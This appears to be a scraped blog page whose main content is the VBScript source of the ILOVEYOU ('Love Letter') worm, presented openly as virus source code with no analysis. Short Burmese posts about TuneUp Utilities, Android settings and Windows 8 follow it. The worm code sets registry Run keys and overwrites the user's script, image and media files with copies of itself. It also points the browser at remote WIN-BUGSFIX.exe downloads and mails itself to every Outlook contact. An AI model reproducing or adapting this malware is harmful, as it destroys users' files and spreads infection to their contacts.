12/26/2011

Love Letter Virus Source Code

-----------------------------------------------------------------------------------------------------------------------------------------------------------------
CODE:
-----------------------------------------------------------------------------------------------------------------------------------------------------------------

rem barok -loveletter(vbe)

rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
 


spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="
Read more »

TuneUp Utilities 2011 v10.0.2011.65

ဒါေလးကေတာ့ ကြန္ပ်ဴတာကုိ Tuneup လုပ္ေပးမယ့္ ေဆာ့ဝဲလ္ေလးပဲျဖစ္ပါတယ္။ မိတ္ေဆြတုိ႔ ကြန္ပ်ဴတာမွာ ရွဳပ္ပြေနတဲ့ Cache file ေတြ၊ Temp file ေတြကုိရွင္းလလင္းေပးမွာျဖစ္တဲ့အျပင္ Hard disk ကုိလည္း Defrag လုပ္ေပးမွာျဖစ္ပါတယ္။ အျခားေသာ Function ေတြလည္းအမ်ားၾကီးပါ။ သုံးဖူးတဲ့သူေတြေတာ့ သိပါလိမ့္မယ္။ လုိခ်င္တယ္ဆုိရင္ ေအာက္ကေနယူသြားူႏုိင္ပါတယ္ခင္ဗ်ာ။
ဖုိင္ဆုိဒ္ကေတာ့ 50 MB ေက်ာ္ေလာက္ပါ။

Read more »

Android Application Setting အသံုးျပဳျခင္း

Android OS ဖုန္းေတြအတြက္ Setting ထဲက Application Setting ကို ဘယ္လိုအသံုးျပဳႏိုင္တယ္ဆိုတာကို ေဖာ္ျပေပးသြားမွာျဖစ္ပါတယ္။ Application Setting ဆိုတာကေတာ့ Android OS ဖုန္းေတြမွာ ထည့္သြင္းအသံုးျပဳထားတဲ့ ေဆာ့ဖ္၀ဲေတြ၊ ဂိမ္းေတြနဲ႔ အျခား Application စနစ္ေတြအားလံုးကို ထိန္းခ်ဳပ္အသံုးျပဳႏိုင္မယ့္ ေနရာတစ္ခုလို႔ပဲ ဆိုရမွာပါပဲ။ ဖုန္းထဲကိုထည့္သြင္းထားတဲ့ Application ေတြကို ပိတ္ထားခ်င္ရင္ပဲျဖစ္ျဖစ္၊ ဖ်က္ပစ္ခ်င္ရင္ပဲျဖစ္ျဖစ္၊ ဒါမွမဟုတ္

Read more »

Windows 8 မိတ္ဆက္

Microsoft ရဲ႕ ေနာက္ပြဲထုတ္မယ့္ Windows 8 ဟာအျပီးအေခ်ာမသတ္ရေသးေပမယ့္ Windows 7 နဲ႕ကြဲျပားျခားနားတဲ့အရာေတြအမ်ားၾကီးရွိေနပါတယ္..ေသခ်ာတာကေတာ့ Start-bar နဲ႔ icon ေတြ User Friendly ျဖစ္တဲ့ Desktop Interface ေတြ..ေနာက္ျပီး Touch Screen ကုိ Support လုပ္တဲ့ Metro လုိ႔ေခၚတဲ့(ဒါေတြကုိ Windows Phone OS ေတြမွာလည္း Run တယ္).

Windows 8 ရဲ႕ ထူးျခားခ်က္မ်ား
1. Windows 8 ဟာ ARM-based processor ေတြမွာေရာ x86-based PC ေတြေပၚမွာပါ Support လုပ္တဲ့ first Edition OS တစ္ခုျဖစ္ပါတယ္..
2. Hybrid Boot Mode ကုိသုံးထားတဲ့အတြက္ Boot Time ကုိ 20 second ထိေလ်ွာခ်ထားတဲ့အတြက္ Windows 7 ထက္ boot time ျမန္မယ့္သေဘာ့ရွိတယ္.. Hybrid Boot Mode ဆုိတာ Logoff နဲ႔ Hibernate ကုိ ေပါင္းထားတဲ့ Technology ေပါ့ေလ..တကယ္လုိ႔ user ဟာ Logoff ကုိကလစ္လုိက္ရင္ Windows က application အားလုံးကုိပိတ္လုိက္မွာျဖစ္ျပီး Hibernate Mode အျဖစ္ဆက္သြားမ်ာျဖစ္တယ္..
3. Windows Store ကုိမိတ္ဆက္ေပးထားတယ္..ဒီကေန Windows အတြက္ app ေတြကုိ ေဒါင္းလုပ္ရႏုိင္မယ့္ လိပ္စာေတြဆီကုိ ေခၚသြားမယ္..
4. Windows 8 ရဲ႕ feature အသစ္တစ္ခုျဖစ္တဲ့ Automatic Maintenance ကေတာ့ Hard Disk ကုိ automatic Defrag လုပ္ေပးျခင္း၊ .Net Optimizing Service ကုိ run ေပးျခင္း၊ Problem ေတြကုိ ရွာေဖြေပးျခင္းေတြျဖစ္ပါေၾကာင္း၊ ဒါေတြအားလုံး Windows ရဲ႕ Performance ကုိ ေကာင္းေစပါတယ္။
5. ဘာေျပာေျပာ Windows 8 ကေတာ့ Touch-centric, Tiles-based User Interface ျဖစ္ပါတယ္၊ Metro application ေတြဟာ လွပတယ္၊ Touch screen အတြက္အထူး Design လုပ္ထားတာပဲ၊
6. Snap-Multitasking ဆုိတာကေတာ့ Windows 8 မွာ application ၂ ခုကုိ Run တဲ့အခါ Side-by-Side အျဖစ္ေဖာ္ျပဖုိ႔ အသုံးျပဳထားတာပဲ၊ Windows 7 မွာလည္းပါျပီးသားပါ..
7. Windows 8 မွာ Built-in Antivirus Protection ပါဝင္မွာျဖစ္ပါတယ္..သူ႕ရဲ႕ Microsoft Security Essential ကုိ မြမ္းမံထားတဲ့ပုံပါပဲ။


8. Built-in Hyper-V ပါဝင္မွာျဖစ္ပါတယ္၊ ဆုိလုိတဲ့သေဘာကေတာ့ Virtual Machine Capability ပါဝင္ျပီးသားျဖစ္ေနပါမယ္။ အရင္ Version မွာတုန္းက Server Version ေတြမွာသာထည့္သြင္းခဲ့တာပါ။
9. Secure Boot: ဒါကေတာ့ Microsoft က Windows 8 မွာ Linux အတြက္ Dual Boot လုပ္ျခင္းကုိ ကာကြယ္ထားတာပါ။
ေျပာရရင္ Windows 8 ဟာ Apple ရဲ႕ iOS နဲ႕ Mac OS X Lion လုိပဲ ေပါ့ပါးတဲ့ OS ျဖစ္မွာပါ၊ လူေတြက Windows 8 boot တက္တာျမန္တာကုိ အံ့ၾသမွာ ေသခ်ာပါတယ္ဗ်ာ။
Read more »